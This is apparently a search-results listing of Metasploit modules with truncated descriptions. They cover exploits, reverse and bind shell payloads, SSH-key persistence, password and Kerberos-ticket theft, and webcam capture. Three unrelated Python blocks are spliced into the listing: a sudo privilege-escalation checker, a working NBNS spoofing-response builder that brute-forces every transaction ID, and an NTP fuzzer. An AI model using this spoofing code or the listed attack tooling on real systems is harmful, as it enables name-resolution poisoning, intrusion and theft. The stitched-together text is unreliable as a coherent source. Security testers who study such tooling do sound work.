6846 matches found
WordPress REST API Content Injection
This module exploits a content injection vulnerability in WordPress versions 4.7 and 4.7.1 via type juggling in the REST API. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress REST API...
SSH Key Persistence
This module will add an SSH key to a specified user or all, to allow remote login via SSH at any time. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'sshkey' class MetasploitModule 'SSH Key Persistence',...
F5 iControl iCall::Script Root Command Execution
This module exploits an authenticated privilege escalation vulnerability in the iControl API on the F5 BIG-IP LTM and likely other F5 devices. This requires valid credentials and the Resource Administrator role. The exploit should work on BIG-IP 11.3.0 - 11.6.0, 11.5.x...
Kaseya VSA Master Administrator Account Creation
This module abuses the setAccount page on Kaseya VSA between 7 and 9.1 to create a new Master Administrator account. Normally this page is only accessible via the localhost interface, but the application does nothing to prevent this apart from attempting to force a redirect. This module has been...
X11 Keyboard Command Injection
This module exploits open X11 servers by connecting and registering a virtual keyboard. The virtual keyboard is used to open an xterm or gnome terminal and type and execute the specified payload. This module requires Metasploit: https://metasploit.com/download Current source:...
Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
Inject a VNC DLL via a reflective loader (Windows x64, staged). Tunnel communication over HTTP (Windows x64, winhttp). This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 745 include...
Windows Outbound-Filtering Rules
This module performs a TCP traceroute to discover outbound-filtering rules. It tries to make a TCP connection to a certain public IP address (this IP does not need to be under your control) using incrementing TTL values. This way, if you get an answer (an ICMP TTL time exceeded packet) fro...
Firefox WebIDL Privileged Javascript Injection
This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox's Javascript APIs. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require...
ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
This module exploits an unauthenticated blind SQL injection in LinkViewFetchServlet, which is exposed in ManageEngine Desktop Central v7 build 70200 to v9 build 90033 and Password Manager Pro v6 build 6500 to v7 build 7002 including the MSP versions. The SQL injection can be used to achieve remot...
Firefox Webcam Chat on Privileged Javascript Shell
This module allows streaming a webcam from a privileged Firefox Javascript shell. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'json' class MetasploitModule 'Firefox Webcam Chat on Privileged Javascript...
Windows Gather Applied Patches
This module enumerates patches applied to a Windows system using the WMI query: SELECT HotFixID, InstalledOn FROM Win32_QuickFixEngineering. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windo...
HP LaserJet Printer SNMP Enumeration
This module allows enumeration of files previously printed. It provides details as filename, client, timestamp and username information. The default community used is "public". This module requires Metasploit: https://metasploit.com/download Current source:...
Quantum vmPRO Backdoor Command
This module abuses a backdoor command in Quantum vmPRO. Any user, even one without admin privileges, can get access to the restricted SSH shell. By using the hidden backdoor "shell-escape" command it's possible to drop to a real root bash shell. This module has been tested successfully on Quantum...
HP Data Protector Cell Request Service Buffer Overflow
This module exploits a stack-based buffer overflow in the Hewlett-Packard Data Protector product. The vulnerability, due to the insecure usage of swprintf, exists at the Cell Request Service crs.exe when parsing packets with opcode 211. This module has been tested successfully on HP Data Protecto...
OSX Manage Webcam
This module will allow the user to detect installed webcams with the LIST action, take a snapshot with the SNAPSHOT action, or record a webcam and mic with the RECORD action This module requires Metasploit: https://metasploit.com/download Current source:...
Unix Command Shell, Double Reverse TCP SSL (openssl)
Creates an interactive shell through two inbound connections This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 182 include Msf::Payload::Single include...
Microsoft Windows Deployment Services Unattend Retrieval
This module retrieves the client unattend file from Windows Deployment Services RPC service and parses out the stored credentials. Tested against Windows 2008 R2 x64 and Windows 2003 x86. This module requires Metasploit: https://metasploit.com/download Current source:...
Unix Command Shell, Reverse TCP (via Python)
Connect back and create a command shell via Python This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = :dynamic include Msf::Payload::Single include Msf::Payload::Python include...
Windows Gather Microsoft Outlook Saved Password Extraction
This module extracts and decrypts saved Microsoft Outlook versions 2002-2010 passwords from the Windows Registry for POP3/IMAP/SMTP/HTTP accounts. In order for decryption to be successful, this module must be executed under the same privileges as the user which originally encrypted the password. ...
CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection
This module exploits a SQL injection flaw in CA Total Defense Suite R12. When supplying a specially crafted soap request to '/UNCWS/Management.asmx', an attacker can abuse the reGenerateReports stored procedure by injecting arbitrary sql statements into the ReportIDs element. This module requires...
Measuresoft ScadaPro Remote Command Execution
This module allows remote attackers to execute arbitrary commands on the affected system by abusing a directory traversal when using the 'xf' command (execute function). An attacker can call system() from msvcrt.dll to upload a backdoor and gain remote code execution. This vulnerability...
7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow
This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application fails to do proper bounds checking before copying data into a small buffer on the stack. This causes a buffer overflow...
Wireshark packet-dect.c Stack Buffer Overflow
This module exploits a stack buffer overflow in Wireshark. Authors: Paul Makowski (initial discovery), sickness (proof of concept), corelanc0d3r (rop explo...
Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
This module exploits a vulnerability in the Smart INdependent Glyphlets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well. This module requires Metasploit: https://metasploit.com/download Current source:...
MacOS X EvoCam HTTP GET Buffer Overflow
This module exploits a stack buffer overflow in the web server provided with the EvoCam program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6, 3.6.7, and possibly earlier...
Oracle DB SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE
The module exploits a SQL injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege. Affected...
UNIX Gather Kerberos Tickets
Post Module to obtain all kerberos tickets on the targeted UNIX machine. Module Options: msf > use post/multi/gather/unix_kerberos_tickets; msf post(unix_kerberos_tickets) > show actions; ...actions...; msf post(unix_kerberos_tickets) > set ACTION; msf post(unix_kerberos_tickets) > show options; ...show and set options...; m...
Safari Proxy Object Type Confusion
This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e....
phpMyAdmin Authenticated Remote Code Execution
phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, which can be exploited post-authentication to execute PHP code in the context of the application. The module has been tested with phpMyAdmin v4.8.1. This module requires Metasploit: https://metasploit.com/download Current source:...
MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya. The exploit might FAIL and CRASH a target system depending on what is overwritten. The exploit supports only x64 targets. Tested on: Windows 2012 R2 x64, Windows 8.1 x64, Windows 10 Pro Build 10240 x64, Windows 10 Enterprise...
Sudo Commands
This module examines the sudoers configuration for the session user and lists the commands executable via sudo. This module also inspects each command and reports potential avenues for privileged code execution due to poor file system permissions or permitting execution of executables known to be...
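The two checks the entry above describes (commands runnable via sudo, then the file-system permissions of each command) can be reproduced on the output of sudo -l. The following is an added example, not the module's own code: it parses a constructed sudo -l listing, flags binaries or parent directories that group/others can write, and flags binaries from an assumed list of programs that can spawn a shell from inside the program (the page's own list is truncated, so that set is an assumption). The temp-directory scenario in demo() is constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Assumed list (not from the page): programs with a built-in way to run a
# shell or arbitrary commands, so sudo rights on them are as good as a root shell.
SHELL_ESCAPE_BINARIES = {
    "bash", "sh", "dash", "zsh", "env", "vi", "vim", "less", "more",
    "find", "awk", "perl", "python", "python3",
}

# One "sudo -l" rule line: "(runas) [TAG: ...] /path/one, /path/two"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_sudo_l(output):
    """Return one dict per command spec found after the 'may run the following commands' banner."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for spec in m.group("cmds").split(","):
            spec = spec.strip()
            if spec:
                rules.append({"runas": m.group("runas").strip(),
                              "nopasswd": "NOPASSWD" in tags,
                              "spec": spec})
    return rules


def _others_can_write(path):
    """True if group or world write bits are set on path (mode-based, not ACL-aware)."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def assess_rule(rule):
    """List the privilege-escalation avenues a single sudo rule opens."""
    spec = rule["spec"]
    if spec == "ALL":
        return ["unrestricted: any command as (%s)" % rule["runas"]]
    findings = []
    if rule["nopasswd"]:
        findings.append("no password required")
    path = spec.split()[0]
    if not os.path.isabs(path):
        findings.append("relative command path: resolved via PATH at run time")
        return findings
    if os.path.basename(path) in SHELL_ESCAPE_BINARIES:
        findings.append("known shell-escape binary: %s" % os.path.basename(path))
    if not os.path.exists(path):
        if _others_can_write(os.path.dirname(path)):
            findings.append("missing binary in a writable directory: %s" % path)
        else:
            findings.append("missing binary: %s" % path)
    else:
        if _others_can_write(path):
            findings.append("binary writable by group/others: %s" % path)
        if _others_can_write(os.path.dirname(path)):
            findings.append("directory writable by group/others: %s" % os.path.dirname(path))
    return findings


def demo():
    """Constructed scenario: two fake binaries in a private temp dir plus sample 'sudo -l' output."""
    tmp = tempfile.mkdtemp()
    vim = os.path.join(tmp, "vim")
    backup = os.path.join(tmp, "backup.sh")
    for p, mode in ((vim, 0o755), (backup, 0o777)):
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, mode)
    output = (
        "Matching Defaults entries for alice on host:\n"
        "    env_reset, secure_path=/usr/sbin:/usr/bin:/sbin:/bin\n"
        "\n"
        "User alice may run the following commands on host:\n"
        "    (root) NOPASSWD: %s, %s\n"
        "    (root) %s/rotate-logs\n"
        "    (backup : backup) ALL\n"
    ) % (vim, backup, tmp)
    return {r["spec"]: assess_rule(r) for r in parse_sudo_l(output)}


if __name__ == "__main__":
    for spec, findings in demo().items():
        print(spec, "->", findings or ["nothing obvious"])
```

The permission check is deliberately mode-based only; on hosts with POSIX ACLs or a sticky-bit parent directory it will under- or over-report, and a real sweep should also follow symlinks to the final target before checking its mode.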
Panda Security PSEvents Privilege Escalation
PSEvents.exe within several Panda Security products runs hourly with SYSTEM privileges. When run, it checks a user writable folder for certain DLL files, and if any are found they are automatically run. Vulnerable Products: Panda Global Protection 2016 'Panda Security PSEvents Privilege...
NetBIOS Response "BadTunnel" Brute Force Spoof (NAT Tunnel)
This module listens for a NetBIOS name request and then continuously spams NetBIOS responses to a target for given hostname, causing the target to cache a malicious address for this name. On high-speed networks, the PPSRATE value should be increased to speed up this attack. As an example, a value...
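The datagram the entry above says is "spammed" at the target is an NBNS positive name query response (RFC 1002). The following is an added example, not the module's code, showing how such a response is built and decoded, and how the brute-force variant enumerates every 16-bit transaction ID so that one of them matches the request the attacker cannot see. The name, address and TTL are constructed sample values.

```python
import socket
import struct

NB_TYPE = 0x0020            # RR_TYPE NB (RFC 1002 section 4.2.1.3)
NB_CLASS_IN = 0x0001
FLAGS_POSITIVE_RESPONSE = 0x8580  # R=1, OPCODE=query, AA=1, RD=1, RA=1, RCODE=0


def encode_netbios_name(name, suffix=0x00):
    """First-level encoding (RFC 1001 section 14.1): pad to 15 chars, add the suffix byte,
    then emit each nibble as 'A' + nibble, giving 32 ASCII characters."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix & 0xFF])
    encoded = bytearray()
    for b in raw:
        encoded.append(0x41 + (b >> 4))
        encoded.append(0x41 + (b & 0x0F))
    return bytes(encoded)


def decode_netbios_name(encoded):
    """Inverse of encode_netbios_name; returns (name, suffix)."""
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(), raw[15]


def build_nbns_response(txid, name, ip, ttl=300, suffix=0x00):
    """Positive name query response mapping `name` to `ip` for `ttl` seconds."""
    header = struct.pack("!HHHHHH", txid, FLAGS_POSITIVE_RESPONSE, 0, 1, 0, 0)  # QD=0, AN=1
    rr_name = b"\x20" + encode_netbios_name(name, suffix) + b"\x00"
    rdata = struct.pack("!H4s", 0x0000, socket.inet_aton(ip))  # NB_FLAGS: unique name, B-node
    return header + rr_name + struct.pack("!HHIH", NB_TYPE, NB_CLASS_IN, ttl, len(rdata)) + rdata


def parse_nbns_response(pkt):
    """Decode the fields a victim's NBNS cache would act on."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    if pkt[12] != 0x20 or pkt[45] != 0x00 or an != 1:
        raise ValueError("not a single-answer NBNS response")
    name, suffix = decode_netbios_name(pkt[13:45])
    rr_type, rr_class, ttl, rdlen = struct.unpack("!HHIH", pkt[46:56])
    nb_flags, addr = struct.unpack("!H4s", pkt[56:62])
    return {"txid": txid, "name": name, "suffix": suffix, "ttl": ttl, "ip": socket.inet_ntoa(addr)}


def brute_force_responses(name, ip, ttl=300):
    """Yield the same response under every possible transaction ID (0..65535).
    Only the first two bytes differ, so the packet is built once and patched."""
    base = build_nbns_response(0, name, ip, ttl)
    for txid in range(0x10000):
        yield struct.pack("!H", txid) + base[2:]


if __name__ == "__main__":
    # Constructed sample: claim WPAD resolves to a documentation-range address.
    pkt = build_nbns_response(0x1234, "WPAD", "192.0.2.99")
    print(len(pkt), "bytes:", parse_nbns_response(pkt))
```

Sending 65536 variants per name is why the module exposes a packets-per-second setting: on a fast LAN the whole transaction-ID space can be covered in a fraction of a second, while a rate that is too low lets the legitimate answer (or the request timeout) win the race.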
ATutor 2.2.1 Directory Traversal / Remote Code Execution
This module exploits a directory traversal vulnerability in ATutor on an Apache/PHP setup with display_errors set to On, which can be used to allow us to upload a malicious ZIP file. On the web application, a blacklist verification is performed before extraction, however it is not sufficient to...
Generate CSV Organizational Chart Data Using Manager Information
This module will generate a CSV file containing all users and their managers, which can be imported into Visio which will render it. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Generate CSV...
Nibbleblog File Upload Vulnerability
Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule...
Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow
This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser encoded audio inside a FLV video, as exploited in the wild on June 2015. This module has been tested successfully on: Windows 7 SP1 32-bit, IE11 and Adobe Flash 18.0.0.160, Windows 7 SP1 32-bit, Firefox 38.0.5 a...
Adobe Flash Player casi32 Integer Overflow
This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as domainMemory for the current application domain. This module has been tested successfully on Windows 7 SP1 32-bit,...
Seagate Business NAS Unauthenticated Remote Command Execution
Some Seagate Business NAS devices are vulnerable to command execution via a local file include vulnerability hidden in the language parameter of the CodeIgniter session cookie. The vulnerability manifests in the way the language files are included in the code on the login page, and hence is open ...
Android Browser RCE Through Google Play Store XFO
This module combines two vulnerabilities to achieve remote code execution on affected Android devices. First, the module exploits CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in versions of Android's open source stock browser (the AOSP Browser) prior to 4.4. Second, th...
NTP Protocol Fuzzer
A simplistic fuzzer for the Network Time Protocol that sends the following probes to understand NTP and look for anomalous NTP behavior: all possible combinations of NTP versions and modes, even if not allowed or specified in the RFCs; short versions of the above; short, invalid datagrams; full-size...
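The probe classes listed above follow directly from the NTP header layout: version and mode share the first octet, so "all combinations" is 8 x 8 = 64 datagrams. The following is an added example, not the module's code, that builds those probes offline (full-size, truncated, and junk), decodes whatever header comes back, and shows what a well-formed packet looks like for comparison. The target address in the main block is a placeholder.

```python
import socket
import struct

NTP_EPOCH_OFFSET = 2208988800   # seconds from 1900-01-01 (NTP epoch) to 1970-01-01 (Unix epoch)
HEADER_FMT = "!BBbbII4sIIIIIIII"  # RFC 5905 section 7.3 header, 48 bytes
HEADER_LEN = struct.calcsize(HEADER_FMT)


def pack_first_byte(li, vn, mode):
    """First octet: Leap Indicator (2 bits) | Version Number (3 bits) | Mode (3 bits)."""
    return ((li & 0x3) << 6) | ((vn & 0x7) << 3) | (mode & 0x7)


def unpack_first_byte(octet):
    return (octet >> 6) & 0x3, (octet >> 3) & 0x7, octet & 0x7


def build_packet(vn, mode, li=0, xmt_unix=0.0):
    """Full-size NTP datagram with the given version/mode and an optional transmit timestamp."""
    secs = ((int(xmt_unix) + NTP_EPOCH_OFFSET) & 0xFFFFFFFF) if xmt_unix else 0  # era 0, wraps in 2036
    frac = int((xmt_unix - int(xmt_unix)) * (1 << 32))
    return struct.pack(HEADER_FMT, pack_first_byte(li, vn, mode),
                       0, 0, 0,             # stratum, poll, precision
                       0, 0, b"\x00" * 4,   # root delay, root dispersion, reference ID
                       0, 0, 0, 0, 0, 0,    # reference, originate, receive timestamps
                       secs, frac)          # transmit timestamp


def parse_packet(data):
    """Decode a response header; anything shorter than a full header is rejected."""
    if len(data) < HEADER_LEN:
        raise ValueError("short NTP datagram: %d bytes" % len(data))
    f = struct.unpack(HEADER_FMT, data[:HEADER_LEN])
    li, vn, mode = unpack_first_byte(f[0])
    return {
        "li": li, "vn": vn, "mode": mode,
        "stratum": f[1], "poll": f[2], "precision": f[3],
        "root_delay": f[4] / 65536.0, "root_dispersion": f[5] / 65536.0,
        "ref_id": f[6],
        "xmt_unix": (f[13] - NTP_EPOCH_OFFSET) + f[14] / float(1 << 32),
    }


def version_mode_probes():
    """All 64 (version, mode) combinations, including ones the RFCs never define."""
    return [("v%d-m%d" % (vn, mode), build_packet(vn, mode))
            for vn in range(8) for mode in range(8)]


def short_probes(length=4):
    """The same combinations truncated to the first few header bytes."""
    return [(label + "-short", pkt[:length]) for label, pkt in version_mode_probes()]


def invalid_probes():
    """Short datagrams of junk that carry no sensible header at all."""
    return [("junk-%d" % n, b"\xff" * n) for n in (1, 2, 3, 4, 8, 16, 47)]


def all_probes():
    return version_mode_probes() + short_probes() + invalid_probes()


def send_probes(host, port=123, timeout=1.0):
    """Send every probe and return {label: raw reply or None}. Uses the network; not run offline."""
    results = {}
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        for label, pkt in all_probes():
            sock.sendto(pkt, (host, port))
            try:
                results[label] = sock.recvfrom(1024)[0]
            except socket.timeout:
                results[label] = None
    return results


if __name__ == "__main__":
    # Placeholder target; replace with a host you are authorised to test.
    for label, reply in send_probes("192.0.2.10").items():
        if reply is None:
            continue
        if len(reply) < HEADER_LEN:
            print(label, "-> short reply of", len(reply), "bytes")
        else:
            print(label, "->", parse_packet(reply))
```

What to look for in the results: a server that answers an undefined version or mode, or answers a 4-byte or junk datagram at all, is exhibiting exactly the anomalous behaviour the fuzzer exists to surface; a conforming implementation ignores such input.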
Firefox Gather Passwords from Privileged Javascript Shell
This module allows collection of passwords from a Firefox Privileged Javascript Shell. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'json' class MetasploitModule 'Firefox Gather Passwords from Privileged...
Windows Manage Set Port Forwarding With PortProxy
This module uses the PortProxy interface from netsh to set up port forwarding persistently even after reboot. PortProxy supports TCP IPv4 and IPv6 connections. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
OpenEMR PHP File Upload Vulnerability
This module exploits a vulnerability found in OpenEMR 4.1.1. By abusing the ofc_upload_image.php file from the openflashchart library, a malicious user can upload a file to the tmp-upload-images directory without any authentication, which results in arbitrary code execution. The module has been test...
Multiple DVR Manufacturers Configuration Disclosure
This module takes advantage of an authentication bypass vulnerability in the web interface of multiple manufacturers' DVR systems, which allows retrieving the device configuration. This module requires Metasploit: https://metasploit.com/download Current source:...
Windows NetLM Downgrade Attack
This module changes the system LmCompatibilityLevel registry value to enable sending LM challenge hashes and initiates an SMB connection to the host specified in the SMBHOST module option. If an SMB server is listening, it will receive the NetLM hashes for the session user. This module requires...
NFR Agent FSFUI Record File Upload RCE
NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload arbitrary files via a directory traversal while handling requests to /FSF/CMD with FSFUI records with UICMD 130. This module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR...
Linux Command Shell, Bind TCP Inline
Listen for a connection and spawn a command shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 232 include Msf::Payload::Single include Msf::Sessions::CommandShellOptions def...
Lantronix Telnet Password Recovery
This module retrieves the setup record from Lantronix serial-to-ethernet devices via the config port 30718/udp, enabled by default and extracts the telnet password. It has been tested successfully on a Lantronix Device Server with software version V5.8.0.1. This module requires Metasploit:...
IBM Rational ClearQuest CQOle Remote Code Execution
This module exploits a function prototype mismatch on the CQOle ActiveX control in IBM Rational ClearQuest. Browser autopwn requirements from the module source: HttpClients::IE, :ua_minver => "6.0", :ua_maxver => "7.0", :javascript => true, :os_name => OperatingSystems::Match::WINDOWS, :classid => "94773112-72E8-11D0-A42E-00A024DED613", :method =>...